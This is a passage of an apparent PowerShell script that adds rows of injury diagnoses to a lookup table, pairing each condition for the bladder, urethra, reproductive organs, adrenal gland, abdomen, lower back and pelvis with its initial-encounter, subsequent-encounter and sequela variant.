$DiagnosisList.Rows.Add("Laceration of bladder","Laceration of bladder, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of bladder","Other injury of bladder, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of bladder","Other injury of bladder, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of bladder","Other injury of bladder, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of urethra","Unspecified injury of urethra, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of urethra","Unspecified injury of urethra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of urethra","Unspecified injury of urethra, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of urethra","Contusion of urethra, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of urethra","Contusion of urethra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of urethra","Contusion of urethra, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of urethra","Laceration of urethra, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of urethra","Laceration of urethra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of urethra","Laceration of urethra, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of urethra","Other injury of urethra, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of urethra","Other injury of urethra, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of urethra","Other injury of urethra, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ovary, unilateral","Unspecified injury of ovary, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ovary, unilateral","Unspecified injury of ovary, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ovary, unilateral","Unspecified injury of ovary, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ovary, bilateral","Unspecified injury of ovary, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ovary, bilateral","Unspecified injury of ovary, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ovary, bilateral","Unspecified injury of ovary, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ovary, unspecified","Unspecified injury of ovary, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ovary, unspecified","Unspecified injury of ovary, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ovary, unspecified","Unspecified injury of ovary, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of ovary, unilateral","Contusion of ovary, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of ovary, unilateral","Contusion of ovary, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of ovary, unilateral","Contusion of ovary, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of ovary, bilateral","Contusion of ovary, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of ovary, bilateral","Contusion of ovary, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of ovary, bilateral","Contusion of ovary, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of ovary, unspecified","Contusion of ovary, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of ovary, unspecified","Contusion of ovary, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of ovary, unspecified","Contusion of ovary, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of ovary, unilateral","Laceration of ovary, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ovary, unilateral","Laceration of ovary, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ovary, unilateral","Laceration of ovary, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of ovary, bilateral","Laceration of ovary, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ovary, bilateral","Laceration of ovary, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ovary, bilateral","Laceration of ovary, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of ovary, unspecified","Laceration of ovary, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ovary, unspecified","Laceration of ovary, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ovary, unspecified","Laceration of ovary, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of ovary, unilateral","Other injury of ovary, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of ovary, unilateral","Other injury of ovary, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of ovary, unilateral","Other injury of ovary, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of ovary, bilateral","Other injury of ovary, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of ovary, bilateral","Other injury of ovary, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of ovary, bilateral","Other injury of ovary, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of ovary, unspecified","Other injury of ovary, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of ovary, unspecified","Other injury of ovary, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of ovary, unspecified","Other injury of ovary, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of fallopian tube, unilateral","Unspecified injury of fallopian tube, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of fallopian tube, unilateral","Unspecified injury of fallopian tube, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of fallopian tube, unilateral","Unspecified injury of fallopian tube, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of fallopian tube, bilateral","Unspecified injury of fallopian tube, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of fallopian tube, bilateral","Unspecified injury of fallopian tube, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of fallopian tube, bilateral","Unspecified injury of fallopian tube, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of fallopian tube, unspecified","Unspecified injury of fallopian tube, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of fallopian tube, unspecified","Unspecified injury of fallopian tube, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of fallopian tube, unspecified","Unspecified injury of fallopian tube, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of fallopian tube, unilateral","Primary blast injury of fallopian tube, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of fallopian tube, unilateral","Primary blast injury of fallopian tube, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of fallopian tube, unilateral","Primary blast injury of fallopian tube, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of fallopian tube, bilateral","Primary blast injury of fallopian tube, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of fallopian tube, bilateral","Primary blast injury of fallopian tube, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of fallopian tube, bilateral","Primary blast injury of fallopian tube, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Primary blast injury of fallopian tube, unspecified","Primary blast injury of fallopian tube, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of fallopian tube, unspecified","Primary blast injury of fallopian tube, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Primary blast injury of fallopian tube, unspecified","Primary blast injury of fallopian tube, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of fallopian tube, unilateral","Contusion of fallopian tube, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of fallopian tube, unilateral","Contusion of fallopian tube, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of fallopian tube, unilateral","Contusion of fallopian tube, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of fallopian tube, bilateral","Contusion of fallopian tube, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of fallopian tube, bilateral","Contusion of fallopian tube, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of fallopian tube, bilateral","Contusion of fallopian tube, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of fallopian tube, unspecified","Contusion of fallopian tube, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of fallopian tube, unspecified","Contusion of fallopian tube, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of fallopian tube, unspecified","Contusion of fallopian tube, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of fallopian tube, unilateral","Laceration of fallopian tube, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of fallopian tube, unilateral","Laceration of fallopian tube, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of fallopian tube, unilateral","Laceration of fallopian tube, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of fallopian tube, bilateral","Laceration of fallopian tube, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of fallopian tube, bilateral","Laceration of fallopian tube, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of fallopian tube, bilateral","Laceration of fallopian tube, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of fallopian tube, unspecified","Laceration of fallopian tube, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of fallopian tube, unspecified","Laceration of fallopian tube, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of fallopian tube, unspecified","Laceration of fallopian tube, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of fallopian tube, unilateral","Other injury of fallopian tube, unilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of fallopian tube, unilateral","Other injury of fallopian tube, unilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of fallopian tube, unilateral","Other injury of fallopian tube, unilateral, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of fallopian tube, bilateral","Other injury of fallopian tube, bilateral, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of fallopian tube, bilateral","Other injury of fallopian tube, bilateral, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of fallopian tube, bilateral","Other injury of fallopian tube, bilateral, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of fallopian tube, unspecified","Other injury of fallopian tube, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of fallopian tube, unspecified","Other injury of fallopian tube, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of fallopian tube, unspecified","Other injury of fallopian tube, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of uterus","Unspecified injury of uterus, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of uterus","Unspecified injury of uterus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of uterus","Unspecified injury of uterus, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of uterus","Contusion of uterus, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of uterus","Contusion of uterus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of uterus","Contusion of uterus, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of uterus","Laceration of uterus, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of uterus","Laceration of uterus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of uterus","Laceration of uterus, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of uterus","Other injury of uterus, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of uterus","Other injury of uterus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of uterus","Other injury of uterus, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of adrenal gland","Contusion of adrenal gland, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of adrenal gland","Contusion of adrenal gland, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of adrenal gland","Contusion of adrenal gland, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of adrenal gland","Laceration of adrenal gland, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of adrenal gland","Laceration of adrenal gland, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of adrenal gland","Laceration of adrenal gland, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of adrenal gland","Other injury of adrenal gland, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of adrenal gland","Other injury of adrenal gland, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of adrenal gland","Other injury of adrenal gland, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of adrenal gland","Unspecified injury of adrenal gland, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of adrenal gland","Unspecified injury of adrenal gland, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of adrenal gland","Unspecified injury of adrenal gland, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of prostate","Contusion of prostate, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of prostate","Contusion of prostate, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of prostate","Contusion of prostate, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of prostate","Laceration of prostate, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of prostate","Laceration of prostate, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of prostate","Laceration of prostate, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of prostate","Other injury of prostate, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of prostate","Other injury of prostate, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of prostate","Other injury of prostate, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of prostate","Unspecified injury of prostate, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of prostate","Unspecified injury of prostate, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of prostate","Unspecified injury of prostate, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of other urinary and pelvic organ","Contusion of other urinary and pelvic organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other urinary and pelvic organ","Contusion of other urinary and pelvic organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of other urinary and pelvic organ","Contusion of other urinary and pelvic organ, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other urinary and pelvic organ","Laceration of other urinary and pelvic organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other urinary and pelvic organ","Laceration of other urinary and pelvic organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other urinary and pelvic organ","Laceration of other urinary and pelvic organ, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other urinary and pelvic organ","Other injury of other urinary and pelvic organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other urinary and pelvic organ","Other injury of other urinary and pelvic organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other urinary and pelvic organ","Other injury of other urinary and pelvic organ, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other urinary and pelvic organ","Unspecified injury of other urinary and pelvic organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other urinary and pelvic organ","Unspecified injury of other urinary and pelvic organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other urinary and pelvic organ","Unspecified injury of other urinary and pelvic organ, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified urinary and pelvic organ","Unspecified injury of unspecified urinary and pelvic organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified urinary and pelvic organ","Unspecified injury of unspecified urinary and pelvic organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified urinary and pelvic organ","Unspecified injury of unspecified urinary and pelvic organ, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified urinary and pelvic organ","Contusion of unspecified urinary and pelvic organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified urinary and pelvic organ","Contusion of unspecified urinary and pelvic organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified urinary and pelvic organ","Contusion of unspecified urinary and pelvic organ, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified urinary and pelvic organ","Laceration of unspecified urinary and pelvic organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified urinary and pelvic organ","Laceration of unspecified urinary and pelvic organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified urinary and pelvic organ","Laceration of unspecified urinary and pelvic organ, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified urinary and pelvic organ","Other injury of unspecified urinary and pelvic organ, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified urinary and pelvic organ","Other injury of unspecified urinary and pelvic organ, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of unspecified urinary and pelvic organ","Other injury of unspecified urinary and pelvic organ, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified external genital organs, male","Crushing injury of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified external genital organs, male","Crushing injury of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified external genital organs, male","Crushing injury of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified external genital organs, female","Crushing injury of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified external genital organs, female","Crushing injury of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified external genital organs, female","Crushing injury of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of penis","Crushing injury of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of penis","Crushing injury of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of penis","Crushing injury of penis, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of scrotum and testis","Crushing injury of scrotum and testis, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of scrotum and testis","Crushing injury of scrotum and testis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of scrotum and testis","Crushing injury of scrotum and testis, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of vulva","Crushing injury of vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of vulva","Crushing injury of vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of vulva","Crushing injury of vulva, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of abdomen, lower back, and pelvis","Crushing injury of abdomen, lower back, and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of abdomen, lower back, and pelvis","Crushing injury of abdomen, lower back, and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of abdomen, lower back, and pelvis","Crushing injury of abdomen, lower back, and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of female external genital organs","Complete traumatic amputation of female external genital organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of female external genital organs","Complete traumatic amputation of female external genital organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of female external genital organs","Complete traumatic amputation of female external genital organs, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of female external genital organs","Partial traumatic amputation of female external genital organs, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of female external genital organs","Partial traumatic amputation of female external genital organs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of female external genital organs","Partial traumatic amputation of female external genital organs, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of penis","Complete traumatic amputation of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of penis","Complete traumatic amputation of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of penis","Complete traumatic amputation of penis, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of penis","Partial traumatic amputation of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of penis","Partial traumatic amputation of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of penis","Partial traumatic amputation of penis, sequela") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of scrotum and testis","Complete traumatic amputation of scrotum and testis, initial encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of scrotum and testis","Complete traumatic amputation of scrotum and testis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Complete traumatic amputation of scrotum and testis","Complete traumatic amputation of scrotum and testis, sequela") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of scrotum and testis","Partial traumatic amputation of scrotum and testis, initial encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of scrotum and testis","Partial traumatic amputation of scrotum and testis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Partial traumatic amputation of scrotum and testis","Partial traumatic amputation of scrotum and testis, sequela") + $null = $DiagnosisList.Rows.Add("Transection (partial) of abdomen","Transection (partial) of abdomen, initial encounter") + $null = $DiagnosisList.Rows.Add("Transection (partial) of abdomen","Transection (partial) of abdomen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Transection (partial) of abdomen","Transection (partial) of abdomen, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of abdomen","Unspecified injury of muscle, fascia and tendon of abdomen, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of abdomen","Unspecified injury of muscle, fascia and tendon of abdomen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of abdomen","Unspecified injury of muscle, fascia and tendon of abdomen, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of lower back","Unspecified injury of muscle, fascia and tendon of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of lower back","Unspecified injury of muscle, fascia and tendon of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of lower back","Unspecified injury of muscle, fascia and tendon of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of pelvis","Unspecified injury of muscle, fascia and tendon of pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of pelvis","Unspecified injury of muscle, fascia and tendon of pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of pelvis","Unspecified injury of muscle, fascia and tendon of pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of abdomen","Strain of muscle, fascia and tendon of abdomen, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of abdomen","Strain of muscle, fascia and tendon of abdomen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of abdomen","Strain of muscle, fascia and tendon of abdomen, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of lower back","Strain of muscle, fascia and tendon of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of lower back","Strain of muscle, fascia and tendon of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of lower back","Strain of muscle, fascia and tendon of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of pelvis","Strain of muscle, fascia and tendon of pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of pelvis","Strain of muscle, fascia and tendon of pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of pelvis","Strain of muscle, fascia and tendon of pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of abdomen","Laceration of muscle, fascia and tendon of abdomen, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of abdomen","Laceration of muscle, fascia and tendon of abdomen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of abdomen","Laceration of muscle, fascia and tendon of abdomen, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of lower back","Laceration of muscle, fascia and tendon of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of lower back","Laceration of muscle, fascia and tendon of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of lower back","Laceration of muscle, fascia and tendon of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of pelvis","Laceration of muscle, fascia and tendon of pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of pelvis","Laceration of muscle, fascia and tendon of pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of pelvis","Laceration of muscle, fascia and tendon of pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of abdomen","Other injury of muscle, fascia and tendon of abdomen, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of abdomen","Other injury of muscle, fascia and tendon of abdomen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of abdomen","Other injury of muscle, fascia and tendon of abdomen, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of lower back","Other injury of muscle, fascia and tendon of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of lower back","Other injury of muscle, fascia and tendon of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of lower back","Other injury of muscle, fascia and tendon of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of pelvis","Other injury of muscle, fascia and tendon of pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of pelvis","Other injury of muscle, fascia and tendon of pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of muscle, fascia and tendon of pelvis","Other injury of muscle, fascia and tendon of pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of abdomen","Other specified injuries of abdomen, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of abdomen","Other specified injuries of abdomen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of abdomen","Other specified injuries of abdomen, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of lower back","Other specified injuries of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of lower back","Other specified injuries of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of lower back","Other specified injuries of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of pelvis","Other specified injuries of pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of pelvis","Other specified injuries of pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of pelvis","Other specified injuries of pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of corpus cavernosum penis","Fracture of corpus cavernosum penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Fracture of corpus cavernosum penis","Fracture of corpus cavernosum penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fracture of corpus cavernosum penis","Fracture of corpus cavernosum penis, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of external genitals","Other specified injuries of external genitals, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of external genitals","Other specified injuries of external genitals, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of external genitals","Other specified injuries of external genitals, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of abdomen","Unspecified injury of abdomen, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of abdomen","Unspecified injury of abdomen, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of abdomen","Unspecified injury of abdomen, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lower back","Unspecified injury of lower back, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lower back","Unspecified injury of lower back, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lower back","Unspecified injury of lower back, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of pelvis","Unspecified injury of pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of pelvis","Unspecified injury of pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of pelvis","Unspecified injury of pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of external genitals","Unspecified injury of external genitals, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of external genitals","Unspecified injury of external genitals, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of external genitals","Unspecified injury of external genitals, 